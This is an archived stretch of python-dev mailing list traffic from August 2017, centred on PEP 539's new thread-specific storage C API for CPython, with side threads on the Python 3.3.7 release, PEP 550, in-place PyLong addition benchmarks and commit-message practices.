    PyAPI_FUNC(int) PyThread_create_key(void)
    PyAPI_FUNC(void) PyThread_delete_key(int key)
    PyAPI_FUNC(int) PyThread_set_key_value(int key, void *value)
    PyAPI_FUNC(void *) PyThread_get_key_value(int key)
    PyAPI_FUNC(void) PyThread_delete_key_value(int key)
    PyAPI_FUNC(void) PyThread_ReInitTLS(void)

These would be superseded by a new set of analogous functions::

    PyAPI_FUNC(int) PyThread_tss_create(Py_tss_t *key)
    PyAPI_FUNC(void) PyThread_tss_delete(Py_tss_t *key)
    PyAPI_FUNC(int) PyThread_tss_set(Py_tss_t *key, void *value)
    PyAPI_FUNC(void *) PyThread_tss_get(Py_tss_t *key)

The specification also adds a few new features:

* A new type ``Py_tss_t``--an opaque type the definition of which may
  depend on the underlying TLS implementation. It is defined::

      typedef struct {
          bool _is_initialized;
          NATIVE_TSS_KEY_T _key;
      } Py_tss_t;

  where ``NATIVE_TSS_KEY_T`` is a macro whose value depends on the
  underlying native TLS implementation (e.g. ``pthread_key_t``).
* A constant default value for ``Py_tss_t`` variables,
  ``Py_tss_NEEDS_INIT``.

* Three new functions::

      PyAPI_FUNC(Py_tss_t *) PyThread_tss_alloc(void)
      PyAPI_FUNC(void) PyThread_tss_free(Py_tss_t *key)
      PyAPI_FUNC(bool) PyThread_tss_is_created(Py_tss_t *key)

  The first two are needed for dynamic (de-)allocation of a ``Py_tss_t``,
  particularly in extension modules built with ``Py_LIMITED_API``, where
  static allocation of this type is not possible due to its implementation
  being opaque at build time. A value returned by ``PyThread_tss_alloc``
  is in the same state as a value initialized with ``Py_tss_NEEDS_INIT``,
  or is ``NULL`` on dynamic allocation failure. The behavior of
  ``PyThread_tss_free`` involves calling ``PyThread_tss_delete``
  preventively, or is a no-op if the value pointed to by the ``key``
  argument is ``NULL``. ``PyThread_tss_is_created`` returns ``true`` if
  the given ``Py_tss_t`` has been initialized (i.e. by
  ``PyThread_tss_create``).

The new TSS API does not provide functions which correspond to
``PyThread_delete_key_value`` and ``PyThread_ReInitTLS``, because these
functions existed only for CPython's own TLS implementation, which has
been removed; that is, the existing API behavior has become as follows:
``PyThread_delete_key_value(key)`` is equivalent to
``PyThread_set_key_value(key, NULL)``, and ``PyThread_ReInitTLS()`` is a
no-op [8]_.

The new ``PyThread_tss_`` functions are almost exactly analogous to their
original counterparts with a few minor differences: Whereas
``PyThread_create_key`` takes no arguments and returns a TLS key as an
``int``, ``PyThread_tss_create`` takes a ``Py_tss_t*`` as an argument and
returns an ``int`` status code. The behavior of ``PyThread_tss_create`` is
undefined if the value pointed to by the ``key`` argument is not
initialized by ``Py_tss_NEEDS_INIT``. The returned status code is zero on
success and non-zero on failure. The meanings of non-zero status codes are
not otherwise defined by this specification.

Similarly the other ``PyThread_tss_`` functions are passed a ``Py_tss_t*``
whereas previously the key was passed by value. This change is necessary,
as being an opaque type, the ``Py_tss_t`` type could hypothetically be
almost any size. This is especially necessary for extension modules built
with ``Py_LIMITED_API``, where the size of the type is not known. Except
for ``PyThread_tss_free``, the behaviors of the ``PyThread_tss_``
functions are undefined if the value pointed to by the ``key`` argument is
``NULL``.

Moreover, because of the use of ``Py_tss_t`` instead of ``int``, there are
additional behaviors from the existing API design that are carried over
into the new API: TSS key creation and deletion are part of a
"do-if-needed" flow, and these operations are silently skipped if already
done--calling ``PyThread_tss_create`` with an initialized key does nothing
and immediately returns success, and the same goes for calling
``PyThread_tss_delete`` with an uninitialized key. The behavior of
``PyThread_tss_delete`` is defined to change the key's initialization
state to "uninitialized", so that the CPython interpreter can be restarted
without terminating the process (e.g. when embedding Python in an
application) [12]_.

The old ``PyThread_*_key*`` functions will be marked as deprecated in the
documentation, but will not generate runtime deprecation warnings.

Additionally, on platforms where ``sizeof(pthread_key_t) != sizeof(int)``,
``PyThread_create_key`` will return immediately with a failure status, and
the other TLS functions will all be no-ops on such platforms.
Comparison of API Specification
-------------------------------

================= ============================== ==============================
API               Thread Local Storage (TLS)     Thread Specific Storage (TSS)
================= ============================== ==============================
Version           Existing                       New
Key Type          ``int``                        ``Py_tss_t`` (opaque type)
Handle Native Key cast to ``int``                conceal into internal field
Function Argument ``int``                        ``Py_tss_t *``
Features          - create key                   - create key
                  - delete key                   - delete key
                  - set value                    - set value
                  - get value                    - get value
                  - delete value                 - (set ``NULL`` instead) [8]_
                  - reinitialize keys (for       - (unnecessary) [8]_
                    after fork)                  - dynamically (de-)allocate
                                                   key
                                                 - check key's initialization
                                                   state
Default Value     (``-1`` as key creation        ``Py_tss_NEEDS_INIT``
                  failure)
Requirement       native thread                  native thread
                                                 (since CPython 3.7 [9]_)
Restriction       Does not support platforms     Unable to statically allocate
                  where the native TLS key is    the key when
                  defined in a way that cannot   ``Py_LIMITED_API`` is defined.
                  be safely cast to ``int``.
================= ============================== ==============================

Example
-------

With the proposed changes, a TSS key is initialized like::

    static Py_tss_t tss_key = Py_tss_NEEDS_INIT;
    if (PyThread_tss_create(&tss_key)) {
        /* ... handle key creation failure ... */
    }

The initialization state of the key can then be checked like::

    assert(PyThread_tss_is_created(&tss_key));

The rest of the API is used analogously to the old API::

    int the_value = 1;
    if (PyThread_tss_get(&tss_key) == NULL) {
        PyThread_tss_set(&tss_key, (void *)&the_value);
        assert(PyThread_tss_get(&tss_key) != NULL);
    }
    /* ... once done with the key ... */
    PyThread_tss_delete(&tss_key);
    assert(!PyThread_tss_is_created(&tss_key));

When ``Py_LIMITED_API`` is defined, a TSS key must be dynamically
allocated::

    static Py_tss_t *ptr_key = PyThread_tss_alloc();
    if (ptr_key == NULL) {
        /* ... handle key allocation failure ... */
    }
    assert(!PyThread_tss_is_created(ptr_key));
    /* ... once done with the key ... */
    PyThread_tss_free(ptr_key);
    ptr_key = NULL;

Platform Support Changes
========================

A new "Native Thread Implementation" section will be added to PEP 11 that
states:

* As of CPython 3.7, when thread support is enabled, all platforms are
  required to provide at least one native thread implementation (pthreads
  or Windows) in order to implement the TSS API. Any TSS API problems that
  occur in an implementation without native threads will be closed as
  "won't fix".

Motivation
==========

The primary problem at issue here is the type of the keys (``int``) used
for TLS values, as defined by the original PyThread TLS API.

The original TLS API was added to Python by GvR back in 1997, and at the
time the key used to represent a TLS value was an ``int``, and so it has
remained to the time of writing. This originally used CPython's own TLS
implementation, which survived, largely unchanged, in Python/thread.c.
Support for implementing the API on top of native thread implementations
(pthreads and Windows) was added much later, and CPython's own
implementation, no longer being necessary, has since been removed [9]_.
The problem with the choice of ``int`` to represent a TLS key is that
while it was fine for CPython's own TLS implementation, and happens to be
compatible with Windows (which uses ``DWORD`` for the analogous data), it
is not compatible with the POSIX standard for the pthreads API, which
defines ``pthread_key_t`` as an opaque type not further defined by the
standard (as with ``Py_tss_t`` described above) [14]_. This leaves it up
to the underlying implementation how a ``pthread_key_t`` value is used to
look up thread-specific data.

This has not generally been a problem for Python's API, as it just happens
that on Linux ``pthread_key_t`` is defined as an ``unsigned int``, and so
is fully compatible with Python's TLS API--``pthread_key_t``'s created by
``pthread_key_create`` can be freely cast to ``int`` and back (well, not
exactly, even this has some limitations as pointed out by issue #22206).

However, as issue #25658 points out, there are at least some platforms
(namely Cygwin, CloudABI, but likely others as well) which have otherwise
modern and POSIX-compliant pthreads implementations, but are not
compatible with Python's API because their ``pthread_key_t`` is defined in
a way that cannot be safely cast to ``int``. In fact, the possibility of
running into this problem was raised by MvL at the time pthreads TLS was
added [2]_.

It could be argued that PEP-11 makes specific requirements for supporting
a new, not otherwise officially-supported platform (such as CloudABI), and
that the status of Cygwin support is currently dubious. However, this
creates a very high barrier to supporting platforms that are otherwise
Linux- and/or POSIX-compatible and where CPython might otherwise "just
work" except for this one hurdle. CPython itself imposes this
implementation barrier by way of an API that is not compatible with POSIX
(and in fact makes invalid assumptions about pthreads).

Rationale for Proposed Solution
===============================

The use of an opaque type (``Py_tss_t``) to key TLS values allows the API
to be compatible with all present (POSIX and Windows) and future (C11?)
native TLS implementations supported by CPython, as it allows the
definition of ``Py_tss_t`` to depend on the underlying implementation.

Since the existing TLS API has been available in *the limited API* [13]_
for some platforms (e.g. Linux), CPython makes an effort to provide the
new TSS API at that level likewise. Note, however, that the ``Py_tss_t``
definition becomes an opaque struct when ``Py_LIMITED_API`` is defined,
because exposing ``NATIVE_TSS_KEY_T`` as part of the limited API would
prevent us from switching native thread implementations without rebuilding
extension modules.

A new API must be introduced, rather than changing the function signatures
of the current API, in order to maintain backwards compatibility. The new
API also more clearly groups together these related functions under a
single name prefix, ``PyThread_tss_``. The "tss" in the name stands for
"thread-specific storage", and was influenced by the naming and design of
the "tss" API that is part of the C11 threads API [15]_. However, this is
in no way meant to imply compatibility with or support for the C11 threads
API, or signal any future intention of supporting C11--it's just the
influence for the naming and design.

The inclusion of the special default value ``Py_tss_NEEDS_INIT`` is
required by the fact that not all native TLS implementations define a
sentinel value for uninitialized TLS keys.
For example, on Windows a TLS key is represented by a ``DWORD``
(``unsigned int``) and its value must be treated as opaque [3]_. So there
is no unsigned integer value that can be safely used to represent an
uninitialized TLS key on Windows. Likewise, POSIX does not specify a
sentinel for an uninitialized ``pthread_key_t``, instead relying on the
``pthread_once`` interface to ensure that a given TLS key is initialized
only once per-process. Therefore, the ``Py_tss_t`` type contains an
explicit ``._is_initialized`` field that can indicate the key's
initialization state independent of the underlying implementation.

Changing ``PyThread_create_key`` to immediately return a failure status on
systems using pthreads where ``sizeof(int) != sizeof(pthread_key_t)`` is
intended as a sanity check: Currently, ``PyThread_create_key`` may report
initial success on such systems, but attempts to use the returned key are
likely to fail. Although in practice this failure occurs earlier in the
interpreter initialization, it's better to fail immediately at the source
of the problem (``PyThread_create_key``) rather than sometime later when
use of an invalid key is attempted. In other words, this indicates clearly
that the old API is not supported on platforms where it cannot be used
reliably, and that no effort will be made to add such support.

Rejected Ideas
==============

* Do nothing: The status quo is fine because it works on Linux, and
  platforms wishing to be supported by CPython should follow the
  requirements of PEP-11. As explained above, while this would be a fair
  argument if CPython were being asked to make changes to support
  particular quirks or features of a specific platform, in this case it is
  a quirk of CPython that prevents it from being used to its full
  potential on otherwise POSIX-compliant platforms. The fact that the
  current implementation happens to work on Linux is a happy accident, and
  there's no guarantee that this will never change.

* Affected platforms should just configure Python ``--without-threads``:
  This is a possible temporary workaround to the issue, but only that.
  Python should not be hobbled on affected platforms despite them being
  otherwise perfectly capable of running multi-threaded Python.

* Affected platforms should use CPython's own TLS implementation instead
  of a native TLS implementation: This is a more acceptable alternative to
  the previous idea, and in fact there had been a patch to do just that
  [4]_. However, CPython's own implementation is in general "slower and
  clunkier" than native implementations, so this would still needlessly
  hobble performance on affected platforms. At least one other module
  (``tracemalloc``) is also broken if Python is built without a native
  implementation. In any case, this idea can no longer be adopted, because
  CPython's own implementation has been removed.

* Keep the existing API, but work around the issue by providing a mapping
  from ``pthread_key_t`` values to ``int`` values. A couple of attempts
  were made at this ([5]_, [6]_), but this only injects needless
  complexity and overhead into performance-critical code on platforms that
  are not currently affected by this issue (such as Linux). Even if use of
  this workaround were made conditional on platform compatibility, it
  introduces platform-specific code to maintain, and still has the problem
  of the previous rejected ideas of needlessly hobbling performance on
  affected platforms.

Implementation
==============

An initial version of a patch [7]_ is available on the bug tracker for
this issue.
Since the migration to Github, it's being developed in the
``pep539-tss-api`` feature branch [10]_ in Masayuki Yamamoto's fork of the
CPython repository on Github. A work-in-progress PR is available at [11]_.

This reference implementation covers not only the enhancement request in
API features, but also the client code fixes needed to replace the
existing TLS API with the new TSS API.

Copyright
=========

This document has been placed in the public domain.

References and Footnotes
========================

.. [1] http://bugs.python.org/issue25658
.. [2] https://bugs.python.org/msg116292
.. [3] https://msdn.microsoft.com/en-us/library/windows/desktop/ms686801(v=vs.85).aspx
.. [4] http://bugs.python.org/file45548/configure-pthread_key_t.patch
.. [5] http://bugs.python.org/file44269/issue25658-1.patch
.. [6] http://bugs.python.org/file44303/key-constant-time.diff
.. [7] http://bugs.python.org/file46379/pythread-tss-3.patch
.. [8] https://bugs.python.org/msg298342
.. [9] http://bugs.python.org/issue30832
.. [10] https://github.com/python/cpython/compare/master...ma8ma:pep539-tss-api
.. [11] https://github.com/python/cpython/pull/1362
.. [12] https://docs.python.org/3/c-api/init.html#c.Py_FinalizeEx
.. [13] It is also called the "stable ABI" (https://www.python.org/dev/peps/pep-0384/)
.. [14] http://pubs.opengroup.org/onlinepubs/009695399/functions/pthread_key_create.html
.. [15] http://www.open-std.org/jtc1/sc22/wg14/www/docs/n1570.pdf#page=404

-------------- next part --------------
An HTML attachment was scrubbed...
URL:

From victor.stinner at gmail.com  Thu Aug 31 04:22:37 2017
From: victor.stinner at gmail.com (Victor Stinner)
Date: Thu, 31 Aug 2017 10:22:37 +0200
Subject: [Python-Dev] [python-committers] Python 3.3.7 release schedule and end-of-life
In-Reply-To: <32CB89BE-A49E-4888-B8C7-4A8CAB8F15F1@python.org>
References: <32CB89BE-A49E-4888-B8C7-4A8CAB8F15F1@python.org>
Message-ID:

Hello,

2017-07-15 23:51 GMT+02:00 Ned Deily :
> To that end, I would like to schedule its next, and hopefully final, security-fix release to coincide with the already announced 3.4.7 security-fix release. In particular, we'll plan to tag and release 3.3.7rc1 on Monday 2017-07-24 (UTC) and tag and release 3.3.7 final on Monday 2017-08-07. In the coming days, I'll be reviewing the outstanding 3.3 security issues and merging appropriate 3.3 PRs. Some of them have been sitting as patches for a long time so, if you have any such security issues that you think belong in 3.3, it would be very helpful if you would review such patches and turn them into 3.3 PRs.

Any update on the 3.3.7 release? 3.3.7rc1 wasn't released yet, no?

By the way, it seems like a recent update of libexpat caused a
regression :-( https://bugs.python.org/issue31170 I didn't have time to
look at that issue yet.

Victor

From ncoghlan at gmail.com  Thu Aug 31 05:51:37 2017
From: ncoghlan at gmail.com (Nick Coghlan)
Date: Thu, 31 Aug 2017 19:51:37 +1000
Subject: [Python-Dev] PEP 539 (second round): A new C API for Thread-Local Storage in CPython
In-Reply-To:
References:
Message-ID:

On 31 August 2017 at 18:16, Masayuki YAMAMOTO wrote:
> Hi python-dev,
>
> Since Erik started the PEP 539 thread on python-ideas, I've collected
> feedback from the discussion and the pull request, and worked on
> improving the API specification and reference implementation; as a
> result, I think the issues that were pointed out have been resolved.
>
> Well, it's probably not finished yet; there is one thing which bothers me.
> I'm not sure about the CPython startup sequence design (PEP 432,
> Restructuring the CPython startup sequence; it might conflict with the
> draft specification [1]),

I think that's just a bug in the startup refactoring - we don't
currently test the "Py_Initialize()/Py_Initialize()/Py_Finalize()"
sequence anywhere, and I'd missed that it's explicitly documented as
being permitted. I'd still want to keep the "multiple calls without an
intervening finalize are prohibited" behaviour for the new more
granular APIs (since it's simpler and easier to explain if it just
always fails rather than attempting to check that the previous
initialization supplied the same config settings), but the documented
Py_Initialize() behaviour can be reinstated by restoring the early
return in _Py_InitializeEx_Private.

It's also worth noting that we *do* test repeated
Py_Initialize()/Py_Finalize() cycles - Py_Finalize() explicitly clears
the internal flags that would otherwise lead to a fatal error in
_Py_InitializeCore.

As far as the PEP itself goes, this version looks good to me, so if
there aren't any other significant comments between now and then, I'm
likely to accept it at the core development sprint next week.

Cheers,
Nick.

--
Nick Coghlan   |   ncoghlan at gmail.com   |   Brisbane, Australia

From erik.m.bray at gmail.com  Thu Aug 31 06:40:36 2017
From: erik.m.bray at gmail.com (Erik Bray)
Date: Thu, 31 Aug 2017 12:40:36 +0200
Subject: [Python-Dev] PEP 539 (second round): A new C API for Thread-Local Storage in CPython
In-Reply-To:
References:
Message-ID:

On Thu, Aug 31, 2017 at 10:16 AM, Masayuki YAMAMOTO wrote:
> Hi python-dev,
>
> Since Erik started the PEP 539 thread on python-ideas, I've collected
> feedback from the discussion and the pull request, and worked on
> improving the API specification and reference implementation; as a
> result, I think the issues that were pointed out have been resolved.

Thanks Masayuki for taking the lead on updating the PEP. I've been
off the ball with it for a while. In particular the table summarizing
the changes is nice. I just have a few minor changes to suggest
(typos and such) that I'll make in a pull request.

From ma3yuki.8mamo10 at gmail.com  Thu Aug 31 09:39:40 2017
From: ma3yuki.8mamo10 at gmail.com (Masayuki YAMAMOTO)
Date: Thu, 31 Aug 2017 22:39:40 +0900
Subject: [Python-Dev] PEP 539 (second round): A new C API for Thread-Local Storage in CPython
In-Reply-To:
References:
Message-ID:

2017-08-31 18:51 GMT+09:00 Nick Coghlan :
> [...]
> I think that's just a bug in the startup refactoring - we don't
> currently test the "Py_Initialize()/Py_Initialize()/Py_Finalize()"
> sequence anywhere, and I'd missed that it's explicitly documented as
> being permitted. I'd still want to keep the "multiple calls without an
> intervening finalize are prohibited" behaviour for the new more
> granular APIs (since it's simpler and easier to explain if it just
> always fails rather than attempting to check that the previous
> initialization supplied the same config settings), but the documented
> Py_Initialize() behaviour can be reinstated by restoring the early
> return in _Py_InitializeEx_Private.

I get the point about the difference between the document and the current
code; I don't mind :)

> As far as the PEP itself goes, this version looks good to me, so if
> there aren't any other significant comments between now and then, I'm
> likely to accept it at the core development sprint next week.

It took time, but I'm happy to be near the finish. Thank you for helping!
Masayuki
-------------- next part --------------
An HTML attachment was scrubbed...
URL:

From ma3yuki.8mamo10 at gmail.com  Thu Aug 31 10:05:21 2017
From: ma3yuki.8mamo10 at gmail.com (Masayuki YAMAMOTO)
Date: Thu, 31 Aug 2017 23:05:21 +0900
Subject: [Python-Dev] PEP 539 (second round): A new C API for Thread-Local Storage in CPython
In-Reply-To:
References:
Message-ID:

Because I couldn't get there by myself, I'm really grateful to you and
your first draft.

Masayuki

2017-08-31 19:40 GMT+09:00 Erik Bray :
> On Thu, Aug 31, 2017 at 10:16 AM, Masayuki YAMAMOTO
> wrote:
> > Hi python-dev,
> >
> > Since Erik started the PEP 539 thread on python-ideas, I've collected
> > feedback from the discussion and the pull request, and worked on
> > improving the API specification and reference implementation; as a
> > result, I think the issues that were pointed out have been resolved.
>
> Thanks Masayuki for taking the lead on updating the PEP. I've been
> off the ball with it for a while. In particular the table summarizing
> the changes is nice. I just have a few minor changes to suggest
> (typos and such) that I'll make in a pull request.
-------------- next part --------------
An HTML attachment was scrubbed...
URL:

From k7hoven at gmail.com  Thu Aug 31 10:13:08 2017
From: k7hoven at gmail.com (Koos Zevenhoven)
Date: Thu, 31 Aug 2017 17:13:08 +0300
Subject: [Python-Dev] PEP 550 v4
In-Reply-To:
References: <20170828111903.GA3032@bytereef.org> <20170828155215.GA3763@bytereef.org> <20170828173327.GA2671@bytereef.org> <59A497C1.1050005@canterbury.ac.nz> <59A49F80.8070808@canterbury.ac.nz> <59A5FA89.1000001@canterbury.ac.nz>
Message-ID:

On Wed, Aug 30, 2017 at 5:36 PM, Yury Selivanov wrote:
> On Wed, Aug 30, 2017 at 9:44 AM, Yury Selivanov
> wrote:
> [..]
> >> FYI, I've been sketching an alternative solution that addresses these
> >> kinds of things. I've been hesitant to post about it, partly because
> >> of the PEP550-based workarounds that Nick, Nathaniel, Yury etc. have
> >> been describing, and partly because that might be a major distraction
> >> from other useful discussions, especially because I wasn't completely
> >> sure yet about whether my approach has some fatal flaw compared to
> >> PEP 550 ;).
> >
> > We'll never know until you post it. Go ahead.

Anyway, thanks to these efforts, your proposal has become somewhat more
competitive compared to mine ;). I'll post mine as soon as I find the
time to write everything down. My intention is before next week.

Koos

--
+ Koos Zevenhoven + http://twitter.com/k7hoven +
-------------- next part --------------
An HTML attachment was scrubbed...
URL:

From catalin.gabriel.manciu at intel.com  Thu Aug 31 14:40:07 2017
From: catalin.gabriel.manciu at intel.com (Manciu, Catalin Gabriel)
Date: Thu, 31 Aug 2017 18:40:07 +0000
Subject: [Python-Dev] Inplace operations for PyLong objects
Message-ID:

Hi everyone,

While looking over the PyLong source code in Objects/longobject.c I came
across the fact that the PyLong object doesn't include implementations
for basic inplace operations such as adding or multiplication:

    [...]
    long_long,  /*nb_int*/
    0,          /*nb_reserved*/
    long_float, /*nb_float*/
    0,          /* nb_inplace_add */
    0,          /* nb_inplace_subtract */
    0,          /* nb_inplace_multiply */
    0,          /* nb_inplace_remainder */
    [...]

While I understand that the immutable nature of this type of object
justifies this approach, I wanted to experiment and see how much
performance an inplace add would bring.
My inplace add will revert to calling the default long_add function when:

- the refcount of the first operand indicates that it's being shared, or
- that operand is one of the preallocated 'small ints'

which should mitigate the effects of not conforming to the PyLong
immutability specification. It also allocates a new PyLong _only_ in case
of a potential overflow.

The workload I used to evaluate this is a simple script that does a lot
of inplace adding:

    import time
    import sys

    def write_progress(prev_percentage, value, limit):
        percentage = (100 * value) // limit
        if percentage != prev_percentage:
            sys.stdout.write("%d%%\r" % (percentage))
            sys.stdout.flush()
        return percentage

    progress = -1
    the_value = 0
    the_increment = ((1 << 30) - 1)
    crt_iter = 0
    total_iters = 10 ** 9

    start = time.time()

    while crt_iter < total_iters:
        the_value += the_increment
        crt_iter += 1
        progress = write_progress(progress, crt_iter, total_iters)

    end = time.time()

    print("\n%.3fs" % (end - start))
    print("the_value: %d" % (the_value))

Running the baseline version outputs:

    ./python inplace.py
    100%
    356.633s
    the_value: 1073741823000000000

Running the modified version outputs:

    ./python inplace.py
    100%
    308.606s
    the_value: 1073741823000000000

In summary, I got a +13.47% improvement for the modified version. The
CPython revision I'm using is 7f066844a79ea201a28b9555baf4bceded90484f
from the master branch and I'm running on a I7 6700K CPU with Turbo-Boost
disabled (frequency is pinned at 4GHz).

Do you think that such an optimization would be a good approach?

Thank you,
Catalin

From brett at python.org  Thu Aug 31 15:27:40 2017
From: brett at python.org (Brett Cannon)
Date: Thu, 31 Aug 2017 19:27:40 +0000
Subject: [Python-Dev] bpo-5001: More-informative multiprocessing error messages (#3079)
In-Reply-To:
References: <3xhkRl6v1MzFqct@mail.python.org> <20170830113931.6730f2c3@fsol>
Message-ID:

On Wed, 30 Aug 2017 at 02:56 Paul Moore wrote:
> On 30 August 2017 at 10:48, Nick Coghlan wrote:
> > On 30 August 2017 at 19:39, Antoine Pitrou wrote:
> >> On Wed, 30 Aug 2017 08:48:56 +0300
> >> Serhiy Storchaka wrote:
> >>> Please, please don't forget to edit commit messages before merging. An
> >>> excessively verbose commit message will be kept in the repository
> >>> forever and will harm future developers that read a history.
> >>
> >> Sorry, I routinely forget about it. Can we have an automated check for
> >> this?
> >
> > Not while we're pushing the "squash & merge" button directly, as
> > there's no opportunity for any automated hooks to run at that point :(
> >
> > More options open up if the actual commit is being handled by a bot,
> > but even that would still depend on us providing an updated commit
> > message via some mechanism.
>
> We could have a check for PRs that contain multiple commits. The check
> would flag that the commit message needs manual editing before
> merging, and would act as a prompt for submitters who are willing to
> do so to squash their PRs themselves. Personally, I'd prefer that as,
> apart from admin activities like making sure the PR and issue number
> references are present and correct, I think the original submitter has
> a better chance of properly summarising the PR in the merged commit
> message anyway.

So you would want a comment when the PR reaches "awaiting merge" with
instructions requesting the author do their own squash commit to simplify
the message for us?

There's also https://github.com/python/bedevere/issues/14 to help
post-commit remind core devs when they forgot to do something.
While it would be too late to fix a problem, hopefully regular reminders would still be helpful. -------------- next part -------------- An HTML attachment was scrubbed... URL: From p.f.moore at gmail.com Thu Aug 31 16:50:44 2017 From: p.f.moore at gmail.com (Paul Moore) Date: Thu, 31 Aug 2017 21:50:44 +0100 Subject: [Python-Dev] bpo-5001: More-informative multiprocessing error messages (#3079) In-Reply-To: References: <3xhkRl6v1MzFqct@mail.python.org> <20170830113931.6730f2c3@fsol> Message-ID: On 31 August 2017 at 20:27, Brett Cannon wrote: > So you would want a comment when the PR reaches "awaiting merge" with > instructions requesting the author do their own squash commit to simplify > the message for us? That would work. It could say that the PR consists of multiple commits and the commit message needs to be summarised when merging, and suggest that if the submitter is willing, they could squash and summarise the message themselves. I don't want to give the impression we're insisting the submitter squash, rather we're pointing out there's an additional step needed and the submitter can help by doing that step if they wish. > There's also https://github.com/python/bedevere/issues/14 to help > post-commit remind core devs when they forgot to do something. While it > would be too late to fix a problem, hopefully regular reminders would still > be helpful. Yeah, that would probably be useful for regular committers. Paul From tjreedy at udel.edu Thu Aug 31 17:24:50 2017 From: tjreedy at udel.edu (Terry Reedy) Date: Thu, 31 Aug 2017 17:24:50 -0400 Subject: [Python-Dev] Inplace operations for PyLong objects In-Reply-To: References: Message-ID: On 8/31/2017 2:40 PM, Manciu, Catalin Gabriel wrote: > Hi everyone, > > While looking over the PyLong source code in Objects/longobject.c I came > across the fact that the PyLong object doesnt't include implementation for > basic inplace operations such as adding or multiplication: > > [...] > long_long, /*nb_int*/ > 0, /*nb_reserved*/ > long_float, /*nb_float*/ > 0, /* nb_inplace_add */ > 0, /* nb_inplace_subtract */ > 0, /* nb_inplace_multiply */ > 0, /* nb_inplace_remainder */ > [...] > > While I understand that the immutable nature of this type of object justifies > this approach, I wanted to experiment and see how much performance an inplace > add would bring. > My inplace add will revert to calling the default long_add function when: > - the refcount of the first operand indicates that it's being shared > or > - that operand is one of the preallocated 'small ints' > which should mitigate the effects of not conforming to the PyLong immutability > specification. > It also allocates a new PyLong _only_ in case of a potential overflow. 
From tjreedy at udel.edu Thu Aug 31 17:46:55 2017
From: tjreedy at udel.edu (Terry Reedy)
Date: Thu, 31 Aug 2017 17:46:55 -0400
Subject: [Python-Dev] bpo-5001: More-informative multiprocessing error messages (#3079)
In-Reply-To: 
References: <3xhkRl6v1MzFqct@mail.python.org>
 <20170830113931.6730f2c3@fsol>
Message-ID: 

On 8/31/2017 3:27 PM, Brett Cannon wrote:
> On Wed, 30 Aug 2017 at 02:56 Paul Moore
> do so to squash their PRs themselves. Personally, I'd prefer that as,
> apart from admin activities like making sure the PR and issue number
> references are present and correct, I think the original submitter has
> a better chance of properly summarising the PR in the merged commit
> message anyway.

My experience is different.

> So you would want a comment when the PR reaches "awaiting merge" with
> instructions requesting that the author do their own squash commit to

My impression is that this makes the individual commits disappear.

> simplify the message for us?

Not me.

-- 
Terry Jan Reedy

From catalin.gabriel.manciu at intel.com Thu Aug 31 19:35:34 2017
From: catalin.gabriel.manciu at intel.com (Manciu, Catalin Gabriel)
Date: Thu, 31 Aug 2017 23:35:34 +0000
Subject: [Python-Dev] Inplace operations for PyLong objects
In-Reply-To: 
References: 
Message-ID: 

> On my machine, the more realistic code, with an implicit C loop,
> the_value = sum(the_increment for i in range(total_iters))
> gives the same value twice as fast as your explicit Python loop.
> (I cut total_iters down to 10**7.)

Your code is faster for a number of reasons:

- range in Python 3 is implemented in C, so it's considerably faster;
  and because your range only goes up to 10 ** 7, the fastest iterator
  is used: rangeiterobject, whose 'next' function,

      rangeiter_next(rangeiterobject *r)

  from rangeobject.c, is implemented using native longs instead of
  CPython PyLongs;

- my code also does some extra work to output a progress indicator.

> You might check whether sum uses an in-place accumulator for ints.

You're right: sum actually works with native longs until it overflows or
you stop adding PyLongs, then it falls back to PyNumber_Add; check

    static PyObject *
    builtin_sum_impl(PyObject *module, PyObject *iterable, PyObject *start)

from bltinmodule.c.
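That fast path is easy to observe without reading the C source: keep the
running total within a machine word and sum() stays on native longs; feed
it values that don't fit and every step becomes a full PyLong addition.
A rough sketch (the exact ratio varies by build and machine):

    import timeit

    small = [1] * 10 ** 6        # the running total fits in a C long
    big = [1 << 100] * 10 ** 6   # every addition is a full PyLong add

    print("machine-word ints:", timeit.timeit(lambda: sum(small), number=10))
    print("big ints:         ", timeit.timeit(lambda: sum(big), number=10))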
The focus of this experiment was inplace adds in general. While, as
you've shown, there are ways to write the loop optimally, the benchmark
was written as a huge loop just to showcase that there is an improvement
with this approach. The performance improvement comes from not having to
allocate and deallocate a PyLong per iteration.

A huge Python program with lots of PyLong inplace operations (not just
adds: this can be applied to all PyLong inplace operations), whether or
not they are in a loop, might benefit from such an optimization.

Thank you,
Catalin

From rosuav at gmail.com Thu Aug 31 19:43:52 2017
From: rosuav at gmail.com (Chris Angelico)
Date: Fri, 1 Sep 2017 09:43:52 +1000
Subject: [Python-Dev] Inplace operations for PyLong objects
In-Reply-To: 
References: 
Message-ID: 

On Fri, Sep 1, 2017 at 9:35 AM, Manciu, Catalin Gabriel wrote:
> A huge Python program with lots of PyLong inplace operations (not just
> adds: this can be applied to all PyLong inplace operations), whether or
> not they are in a loop, might benefit from such an optimization.

If you're doing a lot of numerical work in Python, have you tried
running your code in PyPy? At the very least, it's worth adding as
another data point in your performance comparisons.

ChrisA

From solipsis at pitrou.net Thu Aug 31 20:12:59 2017
From: solipsis at pitrou.net (Antoine Pitrou)
Date: Fri, 1 Sep 2017 02:12:59 +0200
Subject: [Python-Dev] Inplace operations for PyLong objects
References: 
Message-ID: <20170901021259.0bb7d002@fsol>

On Thu, 31 Aug 2017 23:35:34 +0000
"Manciu, Catalin Gabriel" wrote:
>
> The focus of this experiment was inplace adds in general. While, as
> you've shown, there are ways to write the loop optimally, the benchmark
> was written as a huge loop just to showcase that there is an improvement
> with this approach. The performance improvement comes from not having to
> allocate and deallocate a PyLong per iteration.
>
> A huge Python program with lots of PyLong inplace operations (not just
> adds: this can be applied to all PyLong inplace operations), whether or
> not they are in a loop, might benefit from such an optimization.

I'm skeptical that there are programs out there whose performance is
limited by the speed of PyLong inplace additions. Even if you have a
bigint-intensive workload (say public-key cryptography; not that it's
specifically a good idea to implement it in pure Python), chances are
it's spending much of its time in more sophisticated operations such as
multiplication, power or division.

In other words, while your experiment has intellectual and educational
interest, I don't think it shows the path to a useful optimization.

Regards

Antoine.